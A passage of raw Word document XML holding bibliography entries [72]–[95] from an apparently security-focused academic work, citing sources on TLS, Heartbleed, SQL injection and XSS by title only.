        </w:rPr>
        <w:t>Learning SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347EB13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lastRenderedPageBreak/>
        <w:t>[72]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">H. Davis, P. A. Garber, N. Kim, D. Nash, L. O. Connell, and Y. Rabinovitch, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Visual C # . NET Programming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61067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[73]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">W. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Goralski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Hypertext Transfer Protocol,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Illustrated Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442A0C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[74]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">SANS, “The OSI Model: An Overview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OSI Model: An Overview Rachelle L. Miller GSEC Practical Assignment Version 1.2e.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EFB7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[75]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">H. L. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kosakowski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and R. Saxe, “https,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cogn</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Behav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Neurol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,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10.1097/wnn.0000000000000150.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2B44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[76]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. S, S. Pari, and A. Professor, “SSL/TLS SECURITY POSTURE IDENTIFIER,”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xml:space="preserve">. Sci. Mob.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB587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[77]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">IBM, “SSL/TLS handshake,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ibm.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://www.ibm.com/support/knowledgecenter/en/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm. [Accessed: 22-Jan-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADC86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[78]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Dipti, S. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Charjan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, M. Priyanka, S. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bochare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and Y. R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bhuyar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “An Overview of Secure Sockets Layer,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Int. J.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Sci. Appl.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE55A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[79]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. Chandra, M. Messier, and J. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Viega</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Network security with OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459155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[80]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>U. S. D. of C. / the N. T. I. S. (N.I.S.T.), “Advanced Encryption Standard (AES),” 2001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5894F92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[81]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>M. J. Dworkin, “SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions,” 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628519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[82]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">N. Mehta, “The Heartbleed Bug,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2014-0160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF260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[83]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. C. Foster, V. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Osipov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, N. Bhalla, N. Heinen, and D. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aitel</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Buffer Overflow Attacks - Detect, Exploit, Prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF2FDB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[84]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. A. Wheeler, “Preventing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heartbleed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Computer (Long. Beach. Calif).</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10.1109/MC.2014.217.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD06AB"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[85]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Z. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Durumeric</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“The matter of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proceedings of the ACM SIGCOMM Internet Measurement Conference, IMC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2014,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10.1145/2663716.2663755.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F57AC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[86]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Wagner and B. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Schneier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Analysis of the SSL 3.0 protocol,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proc. 2nd Conf. Proc. Second USENIX Work. Electron. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. - Vol. 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 1996,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10.1.1.29.9990.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3574080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[87]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">E. Rescorla, “The Transport Layer Security (TLS) Protocol Version 1.1.,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Internet Engineering Task Force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2006. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F64AA7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[88]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Fogel, S. Farmer, H. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alkofahi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Skjellum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and M. Hafiz, “POODLEs, more POODLEs, FREAK attacks too: How server administrators responded to three serious web vulnerabilities,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,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10.1007/978-3-319-30806-7_8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBD75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[89]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jänecke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Cascading Style Sheets,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Programmierung</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2003.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B01A96"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lastRenderedPageBreak/>
        <w:t>[90]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Cattell, “Scalable SQL and NoSQL data stores,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SIGMOD Rec.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2010,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10.1145/1978915.1978919.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8D65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[91]</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Anley</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Advanced SQL injection in SQL server applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44A0E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[92]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Bisson, “SQL injection,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ITNOW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2005,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10.1093/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itnow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bwi039.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC8B3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[93]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OWASP, “SQL Injection | OWASP,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>owasp.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://owasp.org/www-community/attacks/SQL_Injection. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD58EA8"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[94]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OWASP, “Cross-site Scripting (XSS) - OWASP,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross-site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE760F"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[95]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
